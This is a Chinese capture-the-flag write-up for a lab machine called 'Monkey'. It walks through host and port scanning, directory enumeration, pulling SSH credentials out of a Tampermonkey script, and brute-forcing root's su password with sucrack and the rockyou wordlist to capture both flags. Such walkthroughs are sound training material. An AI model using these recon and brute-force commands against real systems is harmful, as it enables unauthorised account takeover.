【打靶日记】群内靶机Monkey

主机发现

bash 复制代码
┌──(root㉿xhh)-[~/Desktop/xhh/QQ/monkey]
└─# arp-scan -I eth1 -l

192.168.56.123  08:00:27:38:55:db       PCS Systemtechnik GmbH

主机地址为192.168.56.123

端口扫描

bash 复制代码
┌──(root㉿xhh)-[~/Desktop/xhh/QQ/monkey]
└─# nmap -p- 192.168.56.123                

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

扫描出了22和80端口

Web渗透

油猴插件的介绍

目录枚举
bash 复制代码
┌──(root㉿xhh)-[~/Desktop/xhh/QQ/monkey]
└─# gobuster dir -u http://192.168.56.123 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x js
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.123
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
/monkey.js            (Status: 200) [Size: 7293]
Progress: 53166 / 53166 (100.00%)
===============================================================
Finished
===============================================================

因为油猴是管理js的插件,扫一下js文件,扫出来有个monkey.js

获取用户名密码

脚本执行的操作:当访问 plugin2.dsz 或其子域名 时,通过多种加密 / 字符变换方式 生成一组「ID + Key」信息,并随机选择弹窗、页面悬浮窗、控制台输出三种方式展示该信息。

获取ID+Key方式一(执行)

控制台执行monkey.js

拿到**ID:segfault,Key:segfaultNo1**

获取ID+Key方式二(ai)

通过ai逆向或者自己js逆向

拿到4组ID/Key

登录segfault

bash 复制代码
┌──(root㉿xhh)-[~/Desktop/xhh/QQ/monkey]
└─# ssh segfault@192.168.56.123
The authenticity of host '192.168.56.123 (192.168.56.123)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:7: [hashed name]
    ~/.ssh/known_hosts:8: [hashed name]
    ~/.ssh/known_hosts:11: [hashed name]
    ~/.ssh/known_hosts:18: [hashed name]
    ~/.ssh/known_hosts:26: [hashed name]
    ~/.ssh/known_hosts:30: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.123' (ED25519) to the list of known hosts.
segfault@192.168.56.123's password: 
Linux Monkey 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
segfault@Monkey:~$ id
uid=1000(segfault) gid=1000(segfault) groups=1000(segfault)
user.txt
bash 复制代码
segfault@Monkey:~$ cat user.txt 
flag{user-055967acf4caa06c3867b03a337fe29c}

提权

bash 复制代码
segfault@Monkey:~$ sudo -l
Matching Defaults entries for segfault on Monkey:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User segfault may run the following commands on Monkey:
    (ALL) NOPASSWD: /opt/monkey/bin/monkey

测试和初略的看了一下反编译代码,貌似是一个读文件的程序,读到{}会报错,说预期是冒号

找文件打法,启动
bash 复制代码
segfault@Monkey:~$ find / -type f -newermt "2025-11-27" ! -newermt "2025-11-29" ! -path '/proc/*' ! -path '/sys/*' ! -path '/run/*' 2>/dev/null
/usr/bin/sucrack
/usr/local/bin/.hint
(...省略py和monkey调用的库...)

由于user.txt是11-28,所以设置为27-29之间

/usr/local/bin/.hint

bash 复制代码
segfault@Monkey:~$ cat /usr/local/bin/.hint
let s = "sucrack"
s

好像是猴子语言

bash 复制代码
segfault@Monkey:~$ /opt/monkey/bin/monkey /usr/local/bin/.hint
sucrack

/usr/bin/sucrack

sucrack 是一款针对 su 命令 的密码破解工具,通过暴力破解 / 字典攻击尝试获取系统中用户的密码,从而通过 su 切换到目标用户。

bash 复制代码
segfault@Monkey:~$ /usr/bin/sucrack -h
(......)
   /usr/bin/sucrack -a -w 20 -s 10 -u root -rl AFLafld dict.txt

那就拿个字典爆破

bash 复制代码
segfault@Monkey:~$ /usr/bin/sucrack -a -w 20 -s 10 -u root -rl AFLafld rockyou.txt 
-a option not available. Use the --enable-statistics configure flag
-s option not available. Use the --enable-statistics configure flag
password is: 123455

爆破到密码为123455

bash 复制代码
segfault@Monkey:~$ su - root 
Password: 
root@Monkey:~# id
uid=0(root) gid=0(root) groups=0(root)
root.txt
bash 复制代码
root@Monkey:~# cat root.txt 
flag{root-b2f6e98d8658a3697639943f007dd181}
相关推荐
Darkwanderor1 分钟前
Linux进程优先级操作
linux·运维·c语言·c++
AOwhisky1 小时前
Linux(CentOS)系统管理入门笔记(第一期)——从 Multics 到主流发行版
linux·运维·笔记·centos·云计算
从零开始的代码生活_1 小时前
Linux epoll 多路转接详解
linux·运维·网络·后端·tcp/ip·计算机网络·php
渣渣盟1 小时前
Linux软件管理与编辑器命令速查手册
linux·运维·编辑器
无足鸟ICT1 小时前
【RHCA+】扩展正则表达式
linux·正则表达式
一池秋_1 小时前
ubuntu(linux)完美复刻windows11字体,解决linux字体费眼晴
linux·运维·ubuntu
随风一样自由1 小时前
【WSL+Linux】国内网络连接微软官方服务器(或GitHub)不稳定,导致下载内核或Linux发行版时超时断开如何解决?
linux·服务器·wsl
川石课堂软件测试2 小时前
性能测试|Nginx中间件监控与调优
linux·python·nginx·中间件·单元测试·压力测试·harmonyos
次旅行的库2 小时前
解决ValueError: too many values to unpack (expected 2)
linux·人工智能·深度学习·机器学习·推荐算法
小此方4 小时前
Re:Linux系统篇(四十二)通信篇·七:SystemV标准三部曲其之三:信号量与并发编程初步认识
linux·运维·驱动开发